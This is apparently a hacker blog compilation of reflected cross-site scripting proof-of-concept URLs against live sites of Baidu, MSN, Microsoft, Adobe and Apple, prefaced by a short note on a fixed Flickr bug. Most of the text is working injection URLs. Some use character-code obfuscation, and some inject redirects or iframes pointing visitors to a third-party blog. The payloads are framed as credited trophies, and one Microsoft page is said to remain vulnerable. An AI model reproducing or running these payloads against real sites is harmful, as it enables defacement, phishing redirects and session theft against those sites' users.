XSS in flickr.com

Several days ago,i just found a trivial cross-site scripting vulnerability in flickr.com

Vulnerability was fixed within a hour after initial report.Thanks to Joshua Cohen (@heyjoshua).

Some screenshots:

Cross-site scripting flaws in Baidu and MSN

Sony st2tea.blogspot.com


...in baidu.com

https://passport.baidu.com/v2/?reg&tpl='"></script><script>alert(String.fromCharCode(88,83,83,32,98,121,32,102,108,101,120,120,112,111,105,110,116,32,38,32,83,111,110,121));location=(String.fromCharCode(104,116,116,112,58,47,47,115,116,50,116,101,97,46,98,108,111,103,115,112,111,116,46,99,111,109))</script>

...in .msn 

http://fitbie.msn.com/get-fit/videos/?vid="></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 >

http://sport.be.msn.com/running/nl/nieuws/article.html?Article_ID='-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>&utm_source=msn-sportsbox-nl&utm_campaign=sportbe_rss&utm_medium=rss

http://topics.msn.com.tw/fashion/SearchResult.aspx?d=2"/><script>alert('XSS by flexxpoint and Sony')</script>

...simple 

I just grab this from Sony's blog... (:

luni, 19 martie 2012
Microsoft.com Cross Site Scripting
# Date: 19.03.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
..................................................................

For Ryuzaki Lawlet:

http://packetstormsecurity.org/files/110597/Microsoft.com-Cross-Site-Scripting.html

Demo:

http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony%20and%20Flexxpoint%22%29%3C/script%3E%3Cscript%3Ealert%28%22Oh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Uh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22wow..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Microsoft.com%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow!%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/SLcBI3JUKZ4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E

Cross-site scripting vulnerabilities in Microsoft,Adobe,Apple and Symantec web sites

Cross-site scripting vulnerability in microsoft.com

Bad fix from Microsoft,the page was xssed for the first time on 07.03.2012(mirror) and today is still vulnerable...

PoC:

http://www.microsoft.com/en-us/together/possibilities.aspx?a='"--></style><script>confirm(/BAD FIX!/.source);/&b=*/</script>

Cross-site scripting vulnerability in adobe.com

PoC:


https://www.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>&code=blackletter&cat=style

Cross-site scripting vulnerability in support.apple.com

PoC:


http://support.apple.com/kb/index?page=servicefaq&geo='-alert('xss')-'&product=ipad